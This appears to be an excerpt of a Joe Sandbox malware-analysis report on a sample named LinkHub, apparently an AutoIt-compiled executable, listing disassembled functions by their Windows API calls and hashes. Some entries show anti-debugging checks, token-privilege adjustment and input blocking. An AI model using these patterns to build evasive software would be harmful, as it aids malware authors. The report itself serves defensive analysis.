                                                                    • Instruction ID: b58b72a02e2f7600b4777b81466739d8e6a2dc845a89dfadd09ce8367a7d3730
                                                                    • Opcode Fuzzy Hash: 5b50f85511312cacbf310412997afcc294afcd35434ad87be1d9444017656d0b
                                                                    • Instruction Fuzzy Hash: 1C2190B1921B06EBE7309F65DC88BEAB7F8AF40354F10441AE64692152E770EE55CF50
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,002846AC), ref: 002AE482
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 002AE491
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002AE4A2
                                                                    • FindClose.KERNEL32(00000000), ref: 002AE4AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                    • String ID:
                                                                    • API String ID: 2695905019-0
                                                                    • Opcode ID: b57d2e6fb594751d599b57d1e8350ed94785bc162c02c8dc3d17b8fe9b5566f9
                                                                    • Instruction ID: d2441439b8b496909e162abddacb64fb4824cc4ef209ebe1bd5162a7f0cd5cde
                                                                    • Opcode Fuzzy Hash: b57d2e6fb594751d599b57d1e8350ed94785bc162c02c8dc3d17b8fe9b5566f9
                                                                    • Instruction Fuzzy Hash: B2F0A030821E205796106B3CBC0D8AA776DAE07335BA04702FD76C20E0DB789DA68695
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID: %.3d$X64
                                                                    • API String ID: 481472006-1077770165
                                                                    • Opcode ID: 3e62ca3bd8ec62f41310767c17ff6faacb8d210ed9fe37c400b54124fb4a356c
                                                                    • Instruction ID: 50ba0436e7ac16427d4ebb6da297ad198219fd75c09998b0f5542da0bd422467
                                                                    • Opcode Fuzzy Hash: 3e62ca3bd8ec62f41310767c17ff6faacb8d210ed9fe37c400b54124fb4a356c
                                                                    • Instruction Fuzzy Hash: EDD012F5C35108D6CFC0D7909D4DDB9737CBB18701F114452FD0691041E6B099289B25
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00272A8A
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00272A94
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00272AA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 973763b3fa7ad5724b145079c3935c0b89dc50588a729ba815712e147ce27cda
                                                                    • Instruction ID: 0f0b5360e9c339c10bad91fdbe698a02bc8388ce8d420e14715f9e7d49d0cd7e
                                                                    • Opcode Fuzzy Hash: 973763b3fa7ad5724b145079c3935c0b89dc50588a729ba815712e147ce27cda
                                                                    • Instruction Fuzzy Hash: 5931D3749112289BCB21DF68D98879DBBB8AF18310F5082DAE80CA6261E7309F958F45
                                                                    APIs
                                                                      • Part of subcall function 0026014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002609D8
                                                                      • Part of subcall function 0026014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002609F5
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A205A
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A2087
                                                                    • GetLastError.KERNEL32 ref: 002A2097
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                    • String ID:
                                                                    • API String ID: 577356006-0
                                                                    • Opcode ID: 3d58e8dc386033d4eb85847f740b44895e8e352b8621d1cb721dd2ff3866a631
                                                                    • Instruction ID: 115dbb740f72c41e6cc5f2f4b1a1843dec74f649ae48a446e0bd1c07107695a8
                                                                    • Opcode Fuzzy Hash: 3d58e8dc386033d4eb85847f740b44895e8e352b8621d1cb721dd2ff3866a631
                                                                    • Instruction Fuzzy Hash: AA11C1B1824705EFD7189F54ECC6E6BB7BCEB45710B20841EF04653251DB70BC55CA20
                                                                    APIs
                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 0029E664
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID: X64
                                                                    • API String ID: 2645101109-893830106
                                                                    • Opcode ID: 4fc103381c631eb9d303562e0e10ff1fb00a87bf49c780a43448e23c95658bd2
                                                                    • Instruction ID: a0d0f233b1f6b8f2a075965a6dbb28a9581fbfec3dff0ad48ef8cea4eee979ac
                                                                    • Opcode Fuzzy Hash: 4fc103381c631eb9d303562e0e10ff1fb00a87bf49c780a43448e23c95658bd2
                                                                    • Instruction Fuzzy Hash: 13D0C9F482111DEACF80CB50EC88DDD737CBB04305F110652F506A2000D77096488F14
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002C52EE,?,?,00000035,?), ref: 002B4229
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002C52EE,?,?,00000035,?), ref: 002B4239
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 611f964630738bf77dce882b1f05b7c676f5bdef39b4976ffa001e4bf461d145
                                                                    • Instruction ID: 490d2897eec04502f855f34ad5b98c79aaedabbcbe5b3afcdd535421a5e1895e
                                                                    • Opcode Fuzzy Hash: 611f964630738bf77dce882b1f05b7c676f5bdef39b4976ffa001e4bf461d145
                                                                    • Instruction Fuzzy Hash: C8F0E530A512296AE7202A66AC4DFEB3A6DEFC5765F000176F905D3186D9709D00CBB1
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A1B48), ref: 002A1A20
                                                                    • CloseHandle.KERNEL32(?,?,002A1B48), ref: 002A1A35
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: d50a5491d3f7ebe2f9e7405597961e3ff0234c626e72e4a1a911e9dc7e4a89f8
                                                                    • Instruction ID: 0f5bd5ea6daba501c82f078037199e0ad2b1f52fa04a0853c93679939ac0caf5
                                                                    • Opcode Fuzzy Hash: d50a5491d3f7ebe2f9e7405597961e3ff0234c626e72e4a1a911e9dc7e4a89f8
                                                                    • Instruction Fuzzy Hash: 1DE04F72015610AFE7252B10FC09F7377ADEB05321F14885EF4A680470DB626CA0EF10
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 002BF51A
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: 2c085e8e37d090b7a0020163e959a616b87e09fee6cc6d5663e944f8e3f558eb
                                                                    • Instruction ID: 0cd7ac477ae70a5f8bbc16592025767c00e647a873deb03a9c55147c075e03bc
                                                                    • Opcode Fuzzy Hash: 2c085e8e37d090b7a0020163e959a616b87e09fee6cc6d5663e944f8e3f558eb
                                                                    • Instruction Fuzzy Hash: EEE048312202055FD7509F69E804996F7DCAFA47A1F058426F849C7351D670FD908BE0
                                                                    APIs
                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002AEC95
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID:
                                                                    • API String ID: 2434400541-0
                                                                    • Opcode ID: 9e0d8fc6c4215ae72d69af3f92f163133f036dc5c8fd10a10ce1bdd6390a47e2
                                                                    • Instruction ID: d7b14f5710a6e1f79e685472936e7ccaa258baf4c1ecf78dcbcac35ac0456ca9
                                                                    • Opcode Fuzzy Hash: 9e0d8fc6c4215ae72d69af3f92f163133f036dc5c8fd10a10ce1bdd6390a47e2
                                                                    • Instruction Fuzzy Hash: BFD017B61B42026BEC180E3C9B2FF760A4BA303761F82534BB122D5595ECC1A9269121
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0026075E), ref: 00260D4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: df89d9bd7995381b67f78e869d95554464c1f3bdcedcddbca29f5beecf730558
                                                                    • Instruction ID: 455b4f37331935067d05fd1097cd060574dd37a0f2b14f6d3f37506bc6a0e34d
                                                                    • Opcode Fuzzy Hash: df89d9bd7995381b67f78e869d95554464c1f3bdcedcddbca29f5beecf730558
                                                                    • Instruction Fuzzy Hash:
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 002C358D
                                                                    • DeleteObject.GDI32(00000000), ref: 002C35A0
                                                                    • DestroyWindow.USER32 ref: 002C35AF
                                                                    • GetDesktopWindow.USER32 ref: 002C35CA
                                                                    • GetWindowRect.USER32(00000000), ref: 002C35D1
                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 002C3700
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 002C370E
                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C3755
                                                                    • GetClientRect.USER32(00000000,?), ref: 002C3761
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002C379D
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C37BF
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C37D2
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C37DD
                                                                    • GlobalLock.KERNEL32(00000000), ref: 002C37E6
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C37F5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002C37FE
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C3805
                                                                    • GlobalFree.KERNEL32(00000000), ref: 002C3810
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C3822
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,002E0C04,00000000), ref: 002C3838
                                                                    • GlobalFree.KERNEL32(00000000), ref: 002C3848
                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 002C386E
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 002C388D
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C38AF
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C3A9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: 0e4cfd5ee8d812728f6cefcdf4600344370e969f27129309923c99c3bb8876ec
                                                                    • Instruction ID: 59b57ed11a060cfd78c7f5c715f850775e20876baba5125e10fe66413ea9e727
                                                                    • Opcode Fuzzy Hash: 0e4cfd5ee8d812728f6cefcdf4600344370e969f27129309923c99c3bb8876ec
                                                                    • Instruction Fuzzy Hash: F7029B71A10205AFDB14DF64DC89FAEBBB9EB48310F148659F915AB2A0CB74ED11CF60
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?), ref: 002416B4
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00282B07
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00282B40
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00282F85
                                                                      • Part of subcall function 00241802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00241488,?,00000000,?,?,?,?,0024145A,00000000,?), ref: 00241865
                                                                    • SendMessageW.USER32(?,00001053), ref: 00282FC1
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00282FD8
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00282FEE
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00282FF9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                    • String ID: 0$(1$(1$(1
                                                                    • API String ID: 2760611726-809428951
                                                                    • Opcode ID: 94220d59f31b1c71119e19ed89ba99ddb5b258047357f0cf1670f56ef6fda123
                                                                    • Instruction ID: 84eaf7cb31b1aea29bb9d0ecb57b0fab87668024d4519a5502f3a55087879fc2
                                                                    • Opcode Fuzzy Hash: 94220d59f31b1c71119e19ed89ba99ddb5b258047357f0cf1670f56ef6fda123
                                                                    • Instruction Fuzzy Hash: 8B12D434622212DFD729EF14D844BA9BBE9FB44300F58856AF4459B6A1C731ECB6CF81
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 002D7B67
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002D7B98
                                                                    • GetSysColor.USER32(0000000F), ref: 002D7BA4
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 002D7BBE
                                                                    • SelectObject.GDI32(?,?), ref: 002D7BCD
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 002D7BF8
                                                                    • GetSysColor.USER32(00000010), ref: 002D7C00
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 002D7C07
                                                                    • FrameRect.USER32(?,?,00000000), ref: 002D7C16
                                                                    • DeleteObject.GDI32(00000000), ref: 002D7C1D
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 002D7C68
                                                                    • FillRect.USER32(?,?,?), ref: 002D7C9A
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D7CBC
                                                                      • Part of subcall function 002D7E22: GetSysColor.USER32(00000012), ref: 002D7E5B
                                                                      • Part of subcall function 002D7E22: SetTextColor.GDI32(?,002D7B2D), ref: 002D7E5F
                                                                      • Part of subcall function 002D7E22: GetSysColorBrush.USER32(0000000F), ref: 002D7E75
                                                                      • Part of subcall function 002D7E22: GetSysColor.USER32(0000000F), ref: 002D7E80
                                                                      • Part of subcall function 002D7E22: GetSysColor.USER32(00000011), ref: 002D7E9D
                                                                      • Part of subcall function 002D7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002D7EAB
                                                                      • Part of subcall function 002D7E22: SelectObject.GDI32(?,00000000), ref: 002D7EBC
                                                                      • Part of subcall function 002D7E22: SetBkColor.GDI32(?,?), ref: 002D7EC5
                                                                      • Part of subcall function 002D7E22: SelectObject.GDI32(?,?), ref: 002D7ED2
                                                                      • Part of subcall function 002D7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 002D7EF1
                                                                      • Part of subcall function 002D7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002D7F08
                                                                      • Part of subcall function 002D7E22: GetWindowLongW.USER32(?,000000F0), ref: 002D7F15
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                    • String ID:
                                                                    • API String ID: 4124339563-0
                                                                    • Opcode ID: 5d4fed542b7c1b1128e7af08c74a29cf50e483e2083c903e4ae9a0f4d19b158f
                                                                    • Instruction ID: e9c940beed953aabed2e2be9c40361a854c0d6232d05406f124339eb2ad4f503
                                                                    • Opcode Fuzzy Hash: 5d4fed542b7c1b1128e7af08c74a29cf50e483e2083c903e4ae9a0f4d19b158f
                                                                    • Instruction Fuzzy Hash: D5A1AD71419702AFC7009F64EC48B6BBBA9FB48324F504A1BF962961E0E775DC54CB51
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 002C319B
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002C32C7
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002C3306
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002C3316
                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 002C335D
                                                                    • GetClientRect.USER32(00000000,?), ref: 002C3369
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 002C33B2
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002C33C1
                                                                    • GetStockObject.GDI32(00000011), ref: 002C33D1
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002C33D5
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 002C33E5
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002C33EE
                                                                    • DeleteDC.GDI32(00000000), ref: 002C33F7
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002C3423
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 002C343A
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 002C347A
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002C348E
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 002C349F
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 002C34D4
                                                                    • GetStockObject.GDI32(00000011), ref: 002C34DF
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002C34EA
                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 002C34F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
